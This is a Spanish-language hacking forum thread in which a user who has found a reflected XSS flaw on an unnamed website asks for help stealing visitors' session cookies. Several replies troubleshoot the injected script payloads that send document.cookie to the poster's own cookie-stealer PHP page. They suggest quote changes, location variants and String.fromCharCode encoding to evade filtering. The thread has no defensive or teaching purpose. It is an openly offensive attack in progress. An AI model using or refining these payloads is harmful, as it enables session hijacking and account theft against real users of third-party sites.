XSS Help!!!

Iniciado por [{O_o}], 10 Febrero 2010, 17:15 PM

0 Miembros y 4 Visitantes están viendo este tema.

[{O_o}]

Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="[url="http://mysite.us/c.php?cookie="+document.cookie;"]http://mysite.us/c.php?cookie="+document.cookie;[/url]</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!

tragantras

esto va en nivel web... XD
prueba con document.location en lugar de window.location


pD: de javascript no tengo demasiada idea pero es lo k e visto @ google :/


un saludo!
Colaboraciones:
1 2

[{O_o}]

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="[url="http://mysite.us/c.php?cookie="+"]http://mysite.us/c.php?cookie="+[/url] document.cookie;</script>

ya tambien lo e tratado y nada.

Shell Root

En el primer codigo, no te funko porque pusiste
"><scritp>....
y es
"><script>....
xD, ahora en el segundo codigo, intentad ponerlo bajo comillas simples y no dobles
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

[{O_o}]

#4
Shell Root

"><script>document.location='http://mysite.us/c.php?cookie='+ document.cookie;</script>

Tampoco funciono!! no me manda al link es como que no concatena la intruccion del javascript es decir al poner esto en address bar

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie='+document.cookie;</script>

no me manda a la pagina web del javascript a donde esta el cookie stealer pero si le quito la concatanacion es decir  
URL + document.cookie;

http://url_victima.com/empty_personal.phtml?r="><script>window.location='http://myweb.com/c.php?cookie=';</script>

funciona entoces el problema esta en el + document.cookie; que no me concatena.

Castg!

que raro  :-\, nose, proba con self.location

[{O_o}]

http://vitima.com/01109417885/empty_personal.phtml?r="><script>selft.location='http://mypage.com/c.php?cookie='+document.cookie;</script>

Nada no funciona y sigue pasando lo mismo si le quito el + document.cookie funciona normal.

~ Yoya ~

Haber, muestra lo siguiente:

El codigo php para guardar el archivo de texto con las cookie.
Muestra los permiso del archivo php y los permiso de la carpeta donde esta este.
Muestra una captura aver si el XSS funciona correctamente.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

~ Yoya ~

Ps bueno ya tengo la solución, estaba probando lo y lo solucione con la función String.fromCharCode() de javascript. ok bueno mira.

Primero vamos encodear el codigo javascript a ASCII , que sera este:
<script>window.location="http://www.google.com";</script>

Ahora sera:
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62

Entonce la XSS quedara asi
"><script>document.write(String.fromCharCode(
60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 34, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>


Solo ponerlo en el navegador y te redireccionara a google, puedes usar esta herramienta online para que encodes tu codigo a ASCII:
Herramienta

Saludos espero que funcione.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

[{O_o}]

Esa parte funciona correctamente la parte que no me funciona es al agregarle el + document.cookie; al javascript voy intentar con el encode.